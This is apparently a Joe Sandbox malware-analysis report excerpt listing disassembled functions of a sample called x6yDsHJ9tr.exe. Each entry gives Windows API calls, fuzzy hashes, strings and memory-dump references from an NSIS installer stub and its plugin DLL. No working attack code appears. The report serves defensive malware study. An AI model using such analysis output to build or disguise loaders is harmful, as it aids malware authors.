Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58

Function 00405707 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8

Function 00403033 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 0040304E
GetTickCount.KERNEL32 ref: 0040306C
wsprintfW.USER32 ref: 0040309A

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
ShowWindow.USER32(00000000,00000005), ref: 004030CC

Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,000025B1), ref: 0040302C

Strings

... %d%%, xrefs: 00403094

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D

Function 00404FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
GetMessagePos.USER32 ref: 00404FDF
ScreenToClient.USER32(?,?), ref: 00404FF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031

Strings

f, xrefs: 0040500D

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5

Function 00402F98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
wsprintfW.USER32 ref: 00402FEA
SetWindowTextW.USER32(?,?), ref: 00402FFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C

Strings

unpacking data: %d%%, xrefs: 00402FD8, 00402FE8
verifying installer: %d%%, xrefs: 00402FDF

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99

Function 73472655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 734712BB: GlobalAlloc.KERNELBASE(00000040,?,734712DB,?,7347137F,00000019,734711CA,-000000A0), ref: 734712C5

GlobalFree.KERNEL32(?), ref: 73472743
GlobalFree.KERNEL32(00000000), ref: 73472778

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: cf6d106ff7a5b2931b1150adb3fe6392c722063e76548f5f11d796ff932b4022
Instruction ID: 5bbe8a3fb45065c8812acb21a4edeac6e1f1944b44b5434bb032f96df6f6bd4c
Opcode Fuzzy Hash: cf6d106ff7a5b2931b1150adb3fe6392c722063e76548f5f11d796ff932b4022
Instruction Fuzzy Hash: 8D31E072204149EFD72EAF65CAC4FEA77FAFB86344724452DF106A7260C73068059BA9

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98

Function 00404EAE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
wsprintfW.USER32 ref: 00404F58
SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

%u.%u%s%s, xrefs: 00404F39
H/B, xrefs: 00404F41

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H/B
API String ID: 3540041739-2222257793
Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8

Function 73471979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 734719DA
GlobalFree.KERNEL32(?), ref: 73471B7A
GlobalFree.KERNEL32(?), ref: 73471B7F

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 3bd22bd3f5825527ba261e98fe4bd6b1ebc2d0443657d4aa3bf16104c79cd080
Instruction ID: f6e1fa5b441a457655654564cd6aec28dbc25770fd897e95a44829581adda711
Opcode Fuzzy Hash: 3bd22bd3f5825527ba261e98fe4bd6b1ebc2d0443657d4aa3bf16104c79cd080
Instruction Fuzzy Hash: D651D532D00118EFDB1E9FB4C4887EDBBBAEB44314F188159D407B3394E671A946879D

Function 73472480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 734725C2

Part of subcall function 734712CC: lstrcpynW.KERNEL32(00000000,?,7347137F,00000019,734711CA,-000000A0), ref: 734712DC

GlobalAlloc.KERNEL32(00000040), ref: 73472548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73472563

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: cb5fc872e50590b55e64eb45579fa1e393915131f2b4d3016cea6310c5c44fca
Instruction ID: e8134326e2c479b41e529f3ced0515d9467827a95e14eb6d14dcb42c6081cd6a
Opcode Fuzzy Hash: cb5fc872e50590b55e64eb45579fa1e393915131f2b4d3016cea6310c5c44fca
Instruction Fuzzy Hash: 524124B140834AEFE76CEF24D840BA677F8FB44350F10491DF55A9B281E730A589CB69

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED

Function 734716BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734722D8,?,00000808), ref: 734716D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734722D8,?,00000808), ref: 734716DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734722D8,?,00000808), ref: 734716F0
GetProcAddress.KERNEL32(734722D8,00000000), ref: 734716F7
GlobalFree.KERNEL32(00000000), ref: 73471700

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 3ba033bb1ec5c1e7788e049094b94b9fb7fddea8a32e409be8c994ebb7b1e33e
Instruction ID: d6e30de207288eda9587456b6d3574930f193a48e971962149e918bcddf0a0a6
Opcode Fuzzy Hash: 3ba033bb1ec5c1e7788e049094b94b9fb7fddea8a32e409be8c994ebb7b1e33e
Instruction Fuzzy Hash: B3F012731061787BD6202AA79C4CDAB7E9CEF8B2F5B110615F61CA12A085614C01D7F1

Function 00405FFC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 0040600A
CharNextW.USER32(00000000), ref: 0040600F
CharNextW.USER32(00000000), ref: 00406027

Strings

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 00405FFD

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
API String ID: 3213498283-917692060
Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
Instruction ID: 6b36e5aaf6ec4384ffc5acae3f619c12edb839be27b3f0f06f1fa7befb24a934
Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
Instruction Fuzzy Hash: 00F0963198061595DE31F6584C45A7767BCDF55394B02807BE602B71C1D7B888E186DA

Function 00405F51 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F73

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
